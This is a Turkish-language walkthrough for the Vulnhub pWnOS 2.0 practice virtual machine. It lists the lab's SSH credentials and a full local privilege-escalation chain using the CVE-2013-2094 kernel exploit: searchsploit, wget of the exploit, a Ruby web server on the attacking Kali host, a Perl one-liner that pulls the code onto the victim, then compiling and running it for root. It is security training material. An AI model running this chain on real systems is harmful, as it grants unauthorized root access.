Yazıda kullanılan pWnOS: 2.0 (Pre-Release) sanal makinesi Vulnhub sitesinden indirilebilir.
https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
Not: Sanal makineye statik IP ataması yapılmıştır. Bu sebeple kullanılacak sanal adaptörün 10.10.10.0/24’lü olması tavsiye edilmektedir.
Not: Bu makineye aşağıdaki bilgiler ile SSH servisi üzerinden erişim sağlanabilir. Sonra da “su – dan” komutu ile “dan” kullanıcısına geçilebilir.
Kullanıcı Adı: root
Parola: root@ISIntS
Linux işletim sistemine standart yetkilerle elde edilen erişimde standart kullanıcısı (dan) haklarına sahip olunduğu görülmektedir. İşletim sisteminin sürüm bilgilerine bakıldığında Ubuntu 11.04 kullanıldığı ve Linux çekirdek sürümü 2.6.38-8-server ve 64 bit olduğu görülmektedir.
su – dan
id
uname -a
cat /etc/*release*
Linux Kernel 2.6.38 çekirdeğine sahip sistemde “Linux Kernel 2.6.32 < 3.x (CentOS 5/6) – ‘PERF_EVENTS’ Local Privilege Escalation (1)” isimli CVE-2013-2094 ID’li yetki yükseltme zafiyeti bulunmaktadır.
searchsploit 2.6.3 “Local Privilege Escalation” -w
Linux Kernel 2.6.38 çekirdeğindeki bu zafiyet kodu searchsploit çıktısındaki URL’den indirilir.
wget https://www.exploit-db.com/download/25444.c
Kurban sanal makineye indirilmek üzere, Kali üzerinde Ruby ile bir web servis başlatılır.
ruby -rwebrick -e “WEBrick::HTTPServer.new(:Port => 9443, :DocumentRoot => Dir.pwd).start”
Kurban sanal makinesinde Perl komutu ile istismar kodu indirilir.
perl -e ‘use LWP::Simple; getstore(“http://192.168.0.32:9443/25444.c”, “/tmp/Kod-25444.c”);’
ls /tmp/ -la
İndirilen betik derlenerek çalıştırıldığında “root” kullanıcı yetkilerine erişilmiş olur.
gcc -O2 /tmp/Kod-25444.c -o YetkiYukselt-25444
ls -la YetkiYukselt-25444
./YetkiYukselt-25444
Kaynaklar:
http://devloop.users.sourceforge.net/index.php?article82/solution-du-ctf-pwnos-2-0